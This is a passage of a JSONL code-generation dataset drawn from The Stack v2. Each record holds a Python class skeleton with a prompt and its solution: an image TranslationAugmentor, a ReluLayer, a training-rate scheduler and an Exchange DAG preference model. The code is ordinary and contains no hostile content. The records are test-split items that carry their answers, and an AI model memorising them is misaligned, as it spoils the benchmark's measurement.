"7ba258f58991cac4ff68f21670e74127361cda2f", "bodies": ["self.offset = offset\nself.p = p\nself.down_scale = 1", "num_examples = len(data[0])\nfor i in range(num_examples):\n if np.random.uniform(0, 1) > self.p:\n continue\n offset = [self.down_scale * np.random.randint(-self.offset, self.offset + 1) for l in range(2)]\n data[0][i] = self.embed_image(data[0][i], offset)\n for j in range(1, len(data)):\n data[j][i] = self.embed_labels(data[j][i], offset)\nreturn data", "region = image[:, max(-offset[0], 0):image.shape[1] - max(0, offset[0]), max(-offset[1], 0):image.shape[2] - max(0, offset[1])]\npadding = ((0, 0), (max(0, offset[0]), max(0, -offset[0])), (max(0, offset[1]), max(0, -offset[1])))\nregion = np.pad(region, padding, 'reflect')\nreturn region", "new_image = dont_cares * np.ones_like(label)\nnew_image[max(0, offset[0]):label.shape[0] + min(0, offset[0]), max(0, offset[1]):label.shape[1] + min(0, offset[1])] = label[max(-offset[0], 0):label.shape[0] - max(0, offset[0]), max(-offset[1], 0):label.shape[1] - max(0, offset[1])]\nreturn new_image"], "bodies_text": "<|body_start_0|>\n self.offset = offset\n self.p = p\n self.down_scale = 1\n<|end_body_0|>\n\n<|body_start_1|>\n num_examples = len(data[0])\n for i in range(num_examples):\n if np.random.uniform(0, 1) > self.p:\n continue\n offset = [self.down_scale * np.random.randint(-self.offset, self.offset + 1) for l in range(2)]\n data[0][i] = self.embed_image(data[0][i], offset)\n for j in range(1, len(data)):\n data[j][i] = self.embed_labels(data[j][i], offset)\n return data\n<|end_body_1|>\n\n<|body_start_2|>\n region = image[:, max(-offset[0], 0):image.shape[1] - max(0, offset[0]), max(-offset[1], 0):image.shape[2] - max(0, offset[1])]\n padding = ((0, 0), (max(0, offset[0]), max(0, -offset[0])), (max(0, offset[1]), max(0, -offset[1])))\n region = np.pad(region, padding, 'reflect')\n return region\n<|end_body_2|>\n\n<|body_start_3|>\n new_image = dont_cares * np.ones_like(label)\n new_image[max(0, offset[0]):label.shape[0] + min(0, offset[0]), max(0, offset[1]):label.shape[1] + min(0, offset[1])] = label[max(-offset[0], 0):label.shape[0] - max(0, offset[0]), max(-offset[1], 0):label.shape[1] - max(0, offset[1])]\n return new_image\n<|end_body_3|>\n", "class_docstring": "Augments the images by translating the content and applying reflection padding.", "class_name": "TranslationAugmentor", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TranslationAugmentor:\n \"\"\"Augments the images by translating the content and applying reflection padding.\"\"\"\n\n def __init__(self, offset=40, p=1):\n \"\"\"Initializes a new instance of the TranslationAugmentor class. :param offset: The offset by which the image is randomly translated. :param p: The probability that this will be applied.\"\"\"\n <|body_0|>\n\n def augment(self, data):\n \"\"\"Augments the images by translating the content and applying reflection padding. :param data: An array of two elements (images, targets) :return:\"\"\"\n <|body_1|>\n\n def embed_image(self, image, offset):\n \"\"\"Embeds the image and performs reflection padding. :param image: The image to translate. :param offset: The offset by which we translate. :return: The augmented image.\"\"\"\n <|body_2|>\n\n def embed_labels(self, label, offset, dont_cares=-1):\n \"\"\"Embeds the labels in a -1 map. :param label: The label image. :param offset: The offset by which we translate the image. :return: The augmented label image.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.offset = offset\n self.p = p\n self.down_scale = 1\n<|end_body_0|>\n\n<|body_start_1|>\n num_examples = len(data[0])\n for i in range(num_examples):\n if np.random.uniform(0, 1) > self.p:\n continue\n offset = [self.down_scale * np.random.randint(-self.offset, self.offset + 1) for l in range(2)]\n data[0][i] = self.embed_image(data[0][i], offset)\n for j in range(1, len(data)):\n data[j][i] = self.embed_labels(data[j][i], offset)\n return data\n<|end_body_1|>\n\n<|body_start_2|>\n region = image[:, max(-offset[0], 0):image.shape[1] - max(0, offset[0]), max(-offset[1], 0):image.shape[2] - max(0, offset[1])]\n padding = ((0, 0), (max(0, offset[0]), max(0, -offset[0])), (max(0, offset[1]), max(0, -offset[1])))\n region = np.pad(region, padding, 'reflect')\n return region\n<|end_body_2|>\n\n<|body_start_3|>\n new_image = dont_cares * np.ones_like(label)\n new_image[max(0, offset[0]):label.shape[0] + min(0, offset[0]), max(0, offset[1]):label.shape[1] + min(0, offset[1])] = label[max(-offset[0], 0):label.shape[0] - max(0, offset[0]), max(-offset[1], 0):label.shape[1] - max(0, offset[1])]\n return new_image\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000374", "length_bytes": 5227, "license_type": "no_license", "methods": [{"docstring": "Initializes a new instance of the TranslationAugmentor class. :param offset: The offset by which the image is randomly translated. :param p: The probability that this will be applied.", "name": "__init__", "signature": "def __init__(self, offset=40, p=1)"}, {"docstring": "Augments the images by translating the content and applying reflection padding. :param data: An array of two elements (images, targets) :return:", "name": "augment", "signature": "def augment(self, data)"}, {"docstring": "Embeds the image and performs reflection padding. :param image: The image to translate. :param offset: The offset by which we translate. :return: The augmented image.", "name": "embed_image", "signature": "def embed_image(self, image, offset)"}, {"docstring": "Embeds the labels in a -1 map. :param label: The label image. :param offset: The offset by which we translate the image. :return: The augmented label image.", "name": "embed_labels", "signature": "def embed_labels(self, label, offset, dont_cares=-1)"}], "n_methods": 4, "prompt": "Implement the Python class `TranslationAugmentor` described below.\n\nClass description:\nAugments the images by translating the content and applying reflection padding.\n\nMethod signatures and docstrings:\n- def __init__(self, offset=40, p=1): Initializes a new instance of the TranslationAugmentor class. :param offset: The offset by which the image is randomly translated. :param p: The probability that this will be applied.\n- def augment(self, data): Augments the images by translating the content and applying reflection padding. :param data: An array of two elements (images, targets) :return:\n- def embed_image(self, image, offset): Embeds the image and performs reflection padding. :param image: The image to translate. :param offset: The offset by which we translate. :return: The augmented image.\n- def embed_labels(self, label, offset, dont_cares=-1): Embeds the labels in a -1 map. :param label: The label image. :param offset: The offset by which we translate the image. :return: The augmented label image.", "prompted_full_text": "Implement the Python class `TranslationAugmentor` described below.\n\nClass description:\nAugments the images by translating the content and applying reflection padding.\n\nMethod signatures and docstrings:\n- def __init__(self, offset=40, p=1): Initializes a new instance of the TranslationAugmentor class. :param offset: The offset by which the image is randomly translated. :param p: The probability that this will be applied.\n- def augment(self, data): Augments the images by translating the content and applying reflection padding. :param data: An array of two elements (images, targets) :return:\n- def embed_image(self, image, offset): Embeds the image and performs reflection padding. :param image: The image to translate. :param offset: The offset by which we translate. :return: The augmented image.\n- def embed_labels(self, label, offset, dont_cares=-1): Embeds the labels in a -1 map. :param label: The label image. :param offset: The offset by which we translate the image. :return: The augmented label image.\n\n<|skeleton|>\nclass TranslationAugmentor:\n \"\"\"Augments the images by translating the content and applying reflection padding.\"\"\"\n\n def __init__(self, offset=40, p=1):\n \"\"\"Initializes a new instance of the TranslationAugmentor class. :param offset: The offset by which the image is randomly translated. :param p: The probability that this will be applied.\"\"\"\n <|body_0|>\n\n def augment(self, data):\n \"\"\"Augments the images by translating the content and applying reflection padding. :param data: An array of two elements (images, targets) :return:\"\"\"\n <|body_1|>\n\n def embed_image(self, image, offset):\n \"\"\"Embeds the image and performs reflection padding. :param image: The image to translate. :param offset: The offset by which we translate. :return: The augmented image.\"\"\"\n <|body_2|>\n\n def embed_labels(self, label, offset, dont_cares=-1):\n \"\"\"Embeds the labels in a -1 map. :param label: The label image. :param offset: The offset by which we translate the image. :return: The augmented label image.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.offset = offset\n self.p = p\n self.down_scale = 1\n<|end_body_0|>\n\n<|body_start_1|>\n num_examples = len(data[0])\n for i in range(num_examples):\n if np.random.uniform(0, 1) > self.p:\n continue\n offset = [self.down_scale * np.random.randint(-self.offset, self.offset + 1) for l in range(2)]\n data[0][i] = self.embed_image(data[0][i], offset)\n for j in range(1, len(data)):\n data[j][i] = self.embed_labels(data[j][i], offset)\n return data\n<|end_body_1|>\n\n<|body_start_2|>\n region = image[:, max(-offset[0], 0):image.shape[1] - max(0, offset[0]), max(-offset[1], 0):image.shape[2] - max(0, offset[1])]\n padding = ((0, 0), (max(0, offset[0]), max(0, -offset[0])), (max(0, offset[1]), max(0, -offset[1])))\n region = np.pad(region, padding, 'reflect')\n return region\n<|end_body_2|>\n\n<|body_start_3|>\n new_image = dont_cares * np.ones_like(label)\n new_image[max(0, offset[0]):label.shape[0] + min(0, offset[0]), max(0, offset[1]):label.shape[1] + min(0, offset[1])] = label[max(-offset[0], 0):label.shape[0] - max(0, offset[0]), max(-offset[1], 0):label.shape[1] - max(0, offset[1])]\n return new_image\n<|end_body_3|>\n", "revision_id": "d494b3041069d377d6a7a9c296a14334f2fa5acc", "skeleton": "<|skeleton|>\nclass TranslationAugmentor:\n \"\"\"Augments the images by translating the content and applying reflection padding.\"\"\"\n\n def __init__(self, offset=40, p=1):\n \"\"\"Initializes a new instance of the TranslationAugmentor class. :param offset: The offset by which the image is randomly translated. :param p: The probability that this will be applied.\"\"\"\n <|body_0|>\n\n def augment(self, data):\n \"\"\"Augments the images by translating the content and applying reflection padding. :param data: An array of two elements (images, targets) :return:\"\"\"\n <|body_1|>\n\n def embed_image(self, image, offset):\n \"\"\"Embeds the image and performs reflection padding. :param image: The image to translate. :param offset: The offset by which we translate. :return: The augmented image.\"\"\"\n <|body_2|>\n\n def embed_labels(self, label, offset, dont_cares=-1):\n \"\"\"Embeds the labels in a -1 map. :param label: The label image. :param offset: The offset by which we translate the image. :return: The augmented label image.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TranslationAugmentor:\n \"\"\"Augments the images by translating the content and applying reflection padding.\"\"\"\n\n def __init__(self, offset=40, p=1):\n \"\"\"Initializes a new instance of the TranslationAugmentor class. :param offset: The offset by which the image is randomly translated. :param p: The probability that this will be applied.\"\"\"\n self.offset = offset\n self.p = p\n self.down_scale = 1\n\n def augment(self, data):\n \"\"\"Augments the images by translating the content and applying reflection padding. :param data: An array of two elements (images, targets) :return:\"\"\"\n num_examples = len(data[0])\n for i in range(num_examples):\n if np.random.uniform(0, 1) > self.p:\n continue\n offset = [self.down_scale * np.random.randint(-self.offset, self.offset + 1) for l in range(2)]\n data[0][i] = self.embed_image(data[0][i], offset)\n for j in range(1, len(data)):\n data[j][i] = self.embed_labels(data[j][i], offset)\n return data\n\n def embed_image(self, image, offset):\n \"\"\"Embeds the image and performs reflection padding. :param image: The image to translate. :param offset: The offset by which we translate. :return: The augmented image.\"\"\"\n region = image[:, max(-offset[0], 0):image.shape[1] - max(0, offset[0]), max(-offset[1], 0):image.shape[2] - max(0, offset[1])]\n padding = ((0, 0), (max(0, offset[0]), max(0, -offset[0])), (max(0, offset[1]), max(0, -offset[1])))\n region = np.pad(region, padding, 'reflect')\n return region\n\n def embed_labels(self, label, offset, dont_cares=-1):\n \"\"\"Embeds the labels in a -1 map. :param label: The label image. :param offset: The offset by which we translate the image. :return: The augmented label image.\"\"\"\n new_image = dont_cares * np.ones_like(label)\n new_image[max(0, offset[0]):label.shape[0] + min(0, offset[0]), max(0, offset[1]):label.shape[1] + min(0, offset[1])] = label[max(-offset[0], 0):label.shape[0] - max(0, offset[0]), max(-offset[1], 0):label.shape[1] - max(0, offset[1])]\n return new_image\n", "source": "the_stack_v2_python_sparse", "source_path": "python/TobyPDE_FRRN/FRRN-master/dltools/augmentation.py", "source_repo": "LiuFang816/SALSTM_py_data", "split": "test", "star_events_count": 10} {"blob_id": "045502406b37d45cda9fe2299a0c64c3e688a1e9", "bodies": ["is_np = isinstance(inputs, np.ndarray)\nif is_np:\n inputs = torch.tensor(inputs, dtype=torch.float32)\noutputs = torch.nn.functional.relu(inputs)\nif is_np:\n return outputs.numpy()\nreturn outputs", "serialized = transformer_pb.Layer()\nserialized.relu_data.SetInParent()\nreturn serialized", "if serialized.WhichOneof('layer_data') == 'relu_data':\n return cls()\nreturn None"], "bodies_text": "<|body_start_0|>\n is_np = isinstance(inputs, np.ndarray)\n if is_np:\n inputs = torch.tensor(inputs, dtype=torch.float32)\n outputs = torch.nn.functional.relu(inputs)\n if is_np:\n return outputs.numpy()\n return outputs\n<|end_body_0|>\n\n<|body_start_1|>\n serialized = transformer_pb.Layer()\n serialized.relu_data.SetInParent()\n return serialized\n<|end_body_1|>\n\n<|body_start_2|>\n if serialized.WhichOneof('layer_data') == 'relu_data':\n return cls()\n return None\n<|end_body_2|>\n", "class_docstring": "Represents a rectified-linear layer in a network.", "class_name": "ReluLayer", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ReluLayer:\n \"\"\"Represents a rectified-linear layer in a network.\"\"\"\n\n def compute(self, inputs):\n \"\"\"Computes ReLU(@inputs).\"\"\"\n <|body_0|>\n\n def serialize(self):\n \"\"\"Serializes the layer for use with the transformer server.\"\"\"\n <|body_1|>\n\n def deserialize(cls, serialized):\n \"\"\"Deserializes the layer from the Protobuf format.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n is_np = isinstance(inputs, np.ndarray)\n if is_np:\n inputs = torch.tensor(inputs, dtype=torch.float32)\n outputs = torch.nn.functional.relu(inputs)\n if is_np:\n return outputs.numpy()\n return outputs\n<|end_body_0|>\n\n<|body_start_1|>\n serialized = transformer_pb.Layer()\n serialized.relu_data.SetInParent()\n return serialized\n<|end_body_1|>\n\n<|body_start_2|>\n if serialized.WhichOneof('layer_data') == 'relu_data':\n return cls()\n return None\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000375", "length_bytes": 1067, "license_type": "permissive", "methods": [{"docstring": "Computes ReLU(@inputs).", "name": "compute", "signature": "def compute(self, inputs)"}, {"docstring": "Serializes the layer for use with the transformer server.", "name": "serialize", "signature": "def serialize(self)"}, {"docstring": "Deserializes the layer from the Protobuf format.", "name": "deserialize", "signature": "def deserialize(cls, serialized)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_006937", "prompt": "Implement the Python class `ReluLayer` described below.\n\nClass description:\nRepresents a rectified-linear layer in a network.\n\nMethod signatures and docstrings:\n- def compute(self, inputs): Computes ReLU(@inputs).\n- def serialize(self): Serializes the layer for use with the transformer server.\n- def deserialize(cls, serialized): Deserializes the layer from the Protobuf format.", "prompted_full_text": "Implement the Python class `ReluLayer` described below.\n\nClass description:\nRepresents a rectified-linear layer in a network.\n\nMethod signatures and docstrings:\n- def compute(self, inputs): Computes ReLU(@inputs).\n- def serialize(self): Serializes the layer for use with the transformer server.\n- def deserialize(cls, serialized): Deserializes the layer from the Protobuf format.\n\n<|skeleton|>\nclass ReluLayer:\n \"\"\"Represents a rectified-linear layer in a network.\"\"\"\n\n def compute(self, inputs):\n \"\"\"Computes ReLU(@inputs).\"\"\"\n <|body_0|>\n\n def serialize(self):\n \"\"\"Serializes the layer for use with the transformer server.\"\"\"\n <|body_1|>\n\n def deserialize(cls, serialized):\n \"\"\"Deserializes the layer from the Protobuf format.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n is_np = isinstance(inputs, np.ndarray)\n if is_np:\n inputs = torch.tensor(inputs, dtype=torch.float32)\n outputs = torch.nn.functional.relu(inputs)\n if is_np:\n return outputs.numpy()\n return outputs\n<|end_body_0|>\n\n<|body_start_1|>\n serialized = transformer_pb.Layer()\n serialized.relu_data.SetInParent()\n return serialized\n<|end_body_1|>\n\n<|body_start_2|>\n if serialized.WhichOneof('layer_data') == 'relu_data':\n return cls()\n return None\n<|end_body_2|>\n", "revision_id": "19abf589e84ee67317134573054c648bb25c244d", "skeleton": "<|skeleton|>\nclass ReluLayer:\n \"\"\"Represents a rectified-linear layer in a network.\"\"\"\n\n def compute(self, inputs):\n \"\"\"Computes ReLU(@inputs).\"\"\"\n <|body_0|>\n\n def serialize(self):\n \"\"\"Serializes the layer for use with the transformer server.\"\"\"\n <|body_1|>\n\n def deserialize(cls, serialized):\n \"\"\"Deserializes the layer from the Protobuf format.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ReluLayer:\n \"\"\"Represents a rectified-linear layer in a network.\"\"\"\n\n def compute(self, inputs):\n \"\"\"Computes ReLU(@inputs).\"\"\"\n is_np = isinstance(inputs, np.ndarray)\n if is_np:\n inputs = torch.tensor(inputs, dtype=torch.float32)\n outputs = torch.nn.functional.relu(inputs)\n if is_np:\n return outputs.numpy()\n return outputs\n\n def serialize(self):\n \"\"\"Serializes the layer for use with the transformer server.\"\"\"\n serialized = transformer_pb.Layer()\n serialized.relu_data.SetInParent()\n return serialized\n\n def deserialize(cls, serialized):\n \"\"\"Deserializes the layer from the Protobuf format.\"\"\"\n if serialized.WhichOneof('layer_data') == 'relu_data':\n return cls()\n return None\n", "source": "the_stack_v2_python_sparse", "source_path": "pysyrenn/frontend/relu_layer.py", "source_repo": "95616ARG/SyReNN", "split": "test", "star_events_count": 38} {"blob_id": "6b5564c2c0089331b30bec82dbf92a73bedf83f5", "bodies": ["self.lr_scheds = [p.lr_step for p in self.phases]\nself.mom_scheds = [p.mom_step for p in self.phases]\nself.opt = self.learn.opt\nself.opt.lr, self.opt.mom = (self.lr_scheds[0].start, self.mom_scheds[0].start)\nself.idx_s = 0", "if self.idx_s >= len(self.lr_scheds):\n return True\nself.opt.lr = self.lr_scheds[self.idx_s].step()\nself.opt.mom = self.mom_scheds[self.idx_s].step()\nif self.lr_scheds[self.idx_s].is_done:\n self.idx_s += 1"], "bodies_text": "<|body_start_0|>\n self.lr_scheds = [p.lr_step for p in self.phases]\n self.mom_scheds = [p.mom_step for p in self.phases]\n self.opt = self.learn.opt\n self.opt.lr, self.opt.mom = (self.lr_scheds[0].start, self.mom_scheds[0].start)\n self.idx_s = 0\n<|end_body_0|>\n\n<|body_start_1|>\n if self.idx_s >= len(self.lr_scheds):\n return True\n self.opt.lr = self.lr_scheds[self.idx_s].step()\n self.opt.mom = self.mom_scheds[self.idx_s].step()\n if self.lr_scheds[self.idx_s].is_done:\n self.idx_s += 1\n<|end_body_1|>\n", "class_docstring": "Schedule multiple `TrainingPhase` for a `learner`", "class_name": "GeneralScheduler", "detected_licenses": ["LicenseRef-scancode-unknown-license-reference", "Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass GeneralScheduler:\n \"\"\"Schedule multiple `TrainingPhase` for a `learner`\"\"\"\n\n def on_train_begin(self, n_epochs: int, **kwargs: Any) -> None:\n \"\"\"Initialize our lr and mom schedules for training\"\"\"\n <|body_0|>\n\n def on_batch_end(self, **kwargs: Any) -> None:\n \"\"\"Take a step in lr,mom sched, start next sched when current is complete\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.lr_scheds = [p.lr_step for p in self.phases]\n self.mom_scheds = [p.mom_step for p in self.phases]\n self.opt = self.learn.opt\n self.opt.lr, self.opt.mom = (self.lr_scheds[0].start, self.mom_scheds[0].start)\n self.idx_s = 0\n<|end_body_0|>\n\n<|body_start_1|>\n if self.idx_s >= len(self.lr_scheds):\n return True\n self.opt.lr = self.lr_scheds[self.idx_s].step()\n self.opt.mom = self.mom_scheds[self.idx_s].step()\n if self.lr_scheds[self.idx_s].is_done:\n self.idx_s += 1\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000376", "length_bytes": 27312, "license_type": "permissive", "methods": [{"docstring": "Initialize our lr and mom schedules for training", "name": "on_train_begin", "signature": "def on_train_begin(self, n_epochs: int, **kwargs: Any) -> None"}, {"docstring": "Take a step in lr,mom sched, start next sched when current is complete", "name": "on_batch_end", "signature": "def on_batch_end(self, **kwargs: Any) -> None"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001531", "prompt": "Implement the Python class `GeneralScheduler` described below.\n\nClass description:\nSchedule multiple `TrainingPhase` for a `learner`\n\nMethod signatures and docstrings:\n- def on_train_begin(self, n_epochs: int, **kwargs: Any) -> None: Initialize our lr and mom schedules for training\n- def on_batch_end(self, **kwargs: Any) -> None: Take a step in lr,mom sched, start next sched when current is complete", "prompted_full_text": "Implement the Python class `GeneralScheduler` described below.\n\nClass description:\nSchedule multiple `TrainingPhase` for a `learner`\n\nMethod signatures and docstrings:\n- def on_train_begin(self, n_epochs: int, **kwargs: Any) -> None: Initialize our lr and mom schedules for training\n- def on_batch_end(self, **kwargs: Any) -> None: Take a step in lr,mom sched, start next sched when current is complete\n\n<|skeleton|>\nclass GeneralScheduler:\n \"\"\"Schedule multiple `TrainingPhase` for a `learner`\"\"\"\n\n def on_train_begin(self, n_epochs: int, **kwargs: Any) -> None:\n \"\"\"Initialize our lr and mom schedules for training\"\"\"\n <|body_0|>\n\n def on_batch_end(self, **kwargs: Any) -> None:\n \"\"\"Take a step in lr,mom sched, start next sched when current is complete\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.lr_scheds = [p.lr_step for p in self.phases]\n self.mom_scheds = [p.mom_step for p in self.phases]\n self.opt = self.learn.opt\n self.opt.lr, self.opt.mom = (self.lr_scheds[0].start, self.mom_scheds[0].start)\n self.idx_s = 0\n<|end_body_0|>\n\n<|body_start_1|>\n if self.idx_s >= len(self.lr_scheds):\n return True\n self.opt.lr = self.lr_scheds[self.idx_s].step()\n self.opt.mom = self.mom_scheds[self.idx_s].step()\n if self.lr_scheds[self.idx_s].is_done:\n self.idx_s += 1\n<|end_body_1|>\n", "revision_id": "7989b9721dda08fd1df146666f0855f1832e252e", "skeleton": "<|skeleton|>\nclass GeneralScheduler:\n \"\"\"Schedule multiple `TrainingPhase` for a `learner`\"\"\"\n\n def on_train_begin(self, n_epochs: int, **kwargs: Any) -> None:\n \"\"\"Initialize our lr and mom schedules for training\"\"\"\n <|body_0|>\n\n def on_batch_end(self, **kwargs: Any) -> None:\n \"\"\"Take a step in lr,mom sched, start next sched when current is complete\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class GeneralScheduler:\n \"\"\"Schedule multiple `TrainingPhase` for a `learner`\"\"\"\n\n def on_train_begin(self, n_epochs: int, **kwargs: Any) -> None:\n \"\"\"Initialize our lr and mom schedules for training\"\"\"\n self.lr_scheds = [p.lr_step for p in self.phases]\n self.mom_scheds = [p.mom_step for p in self.phases]\n self.opt = self.learn.opt\n self.opt.lr, self.opt.mom = (self.lr_scheds[0].start, self.mom_scheds[0].start)\n self.idx_s = 0\n\n def on_batch_end(self, **kwargs: Any) -> None:\n \"\"\"Take a step in lr,mom sched, start next sched when current is complete\"\"\"\n if self.idx_s >= len(self.lr_scheds):\n return True\n self.opt.lr = self.lr_scheds[self.idx_s].step()\n self.opt.mom = self.mom_scheds[self.idx_s].step()\n if self.lr_scheds[self.idx_s].is_done:\n self.idx_s += 1\n", "source": "the_stack_v2_python_sparse", "source_path": "dev_nb/nb_004.py", "source_repo": "EmbraceLife/fastai_docs", "split": "test", "star_events_count": 3} {"blob_id": "599335427fffc97d46e9023de8f0dba1753c4857", "bodies": ["self.passive_copy_preference_server_guid_list = passive_copy_preference_server_guid_list\nself.passive_only = passive_only\nself.use_user_specified_passive_preference_order = use_user_specified_passive_preference_order", "if dictionary is None:\n return None\npassive_copy_preference_server_guid_list = dictionary.get('passiveCopyPreferenceServerGuidList')\npassive_only = dictionary.get('passiveOnly')\nuse_user_specified_passive_preference_order = dictionary.get('useUserSpecifiedPassivePreferenceOrder')\nreturn cls(passive_copy_preference_server_guid_list, passive_only, use_user_specified_passive_preference_order)"], "bodies_text": "<|body_start_0|>\n self.passive_copy_preference_server_guid_list = passive_copy_preference_server_guid_list\n self.passive_only = passive_only\n self.use_user_specified_passive_preference_order = use_user_specified_passive_preference_order\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n passive_copy_preference_server_guid_list = dictionary.get('passiveCopyPreferenceServerGuidList')\n passive_only = dictionary.get('passiveOnly')\n use_user_specified_passive_preference_order = dictionary.get('useUserSpecifiedPassivePreferenceOrder')\n return cls(passive_copy_preference_server_guid_list, passive_only, use_user_specified_passive_preference_order)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'ExchangeDAGProtectionPreference' model. Specifies the information about the preference order while choosing between which database copy of the database which is part of DAG should be protected. Attributes: passive_copy_preference_server_guid_list (list of string): Specifies the preference order of the exchange servers from which passive database copies should be protected. The preference order is descending which indicates that passive database copy in the first server in the list gets the highest preference. passive_only (bool): Specifies that only passive database copies should be protected if this is set to true. If this is set to false, both active and passive data", "class_name": "ExchangeDAGProtectionPreference", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ExchangeDAGProtectionPreference:\n \"\"\"Implementation of the 'ExchangeDAGProtectionPreference' model. Specifies the information about the preference order while choosing between which database copy of the database which is part of DAG should be protected. Attributes: passive_copy_preference_server_guid_list (list of string): Specifies the preference order of the exchange servers from which passive database copies should be protected. The preference order is descending which indicates that passive database copy in the first server in the list gets the highest preference. passive_only (bool): Specifies that only passive database copies should be protected if this is set to true. If this is set to false, both active and passive data\"\"\"\n\n def __init__(self, passive_copy_preference_server_guid_list=None, passive_only=None, use_user_specified_passive_preference_order=None):\n \"\"\"Constructor for the ExchangeDAGProtectionPreference class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.passive_copy_preference_server_guid_list = passive_copy_preference_server_guid_list\n self.passive_only = passive_only\n self.use_user_specified_passive_preference_order = use_user_specified_passive_preference_order\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n passive_copy_preference_server_guid_list = dictionary.get('passiveCopyPreferenceServerGuidList')\n passive_only = dictionary.get('passiveOnly')\n use_user_specified_passive_preference_order = dictionary.get('useUserSpecifiedPassivePreferenceOrder')\n return cls(passive_copy_preference_server_guid_list, passive_only, use_user_specified_passive_preference_order)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000377", "length_bytes": 3474, "license_type": "permissive", "methods": [{"docstring": "Constructor for the ExchangeDAGProtectionPreference class", "name": "__init__", "signature": "def __init__(self, passive_copy_preference_server_guid_list=None, passive_only=None, use_user_specified_passive_preference_order=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "prompt": "Implement the Python class `ExchangeDAGProtectionPreference` described below.\n\nClass description:\nImplementation of the 'ExchangeDAGProtectionPreference' model. Specifies the information about the preference order while choosing between which database copy of the database which is part of DAG should be protected. Attributes: passive_copy_preference_server_guid_list (list of string): Specifies the preference order of the exchange servers from which passive database copies should be protected. The preference order is descending which indicates that passive database copy in the first server in the list gets the highest preference. passive_only (bool): Specifies that only passive database copies should be protected if this is set to true. If this is set to false, both active and passive data\n\nMethod signatures and docstrings:\n- def __init__(self, passive_copy_preference_server_guid_list=None, passive_only=None, use_user_specified_passive_preference_order=None): Constructor for the ExchangeDAGProtectionPreference class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `ExchangeDAGProtectionPreference` described below.\n\nClass description:\nImplementation of the 'ExchangeDAGProtectionPreference' model. Specifies the information about the preference order while choosing between which database copy of the database which is part of DAG should be protected. Attributes: passive_copy_preference_server_guid_list (list of string): Specifies the preference order of the exchange servers from which passive database copies should be protected. The preference order is descending which indicates that passive database copy in the first server in the list gets the highest preference. passive_only (bool): Specifies that only passive database copies should be protected if this is set to true. If this is set to false, both active and passive data\n\nMethod signatures and docstrings:\n- def __init__(self, passive_copy_preference_server_guid_list=None, passive_only=None, use_user_specified_passive_preference_order=None): Constructor for the ExchangeDAGProtectionPreference class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass ExchangeDAGProtectionPreference:\n \"\"\"Implementation of the 'ExchangeDAGProtectionPreference' model. Specifies the information about the preference order while choosing between which database copy of the database which is part of DAG should be protected. Attributes: passive_copy_preference_server_guid_list (list of string): Specifies the preference order of the exchange servers from which passive database copies should be protected. The preference order is descending which indicates that passive database copy in the first server in the list gets the highest preference. passive_only (bool): Specifies that only passive database copies should be protected if this is set to true. If this is set to false, both active and passive data\"\"\"\n\n def __init__(self, passive_copy_preference_server_guid_list=None, passive_only=None, use_user_specified_passive_preference_order=None):\n \"\"\"Constructor for the ExchangeDAGProtectionPreference class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.passive_copy_preference_server_guid_list = passive_copy_preference_server_guid_list\n self.passive_only = passive_only\n self.use_user_specified_passive_preference_order = 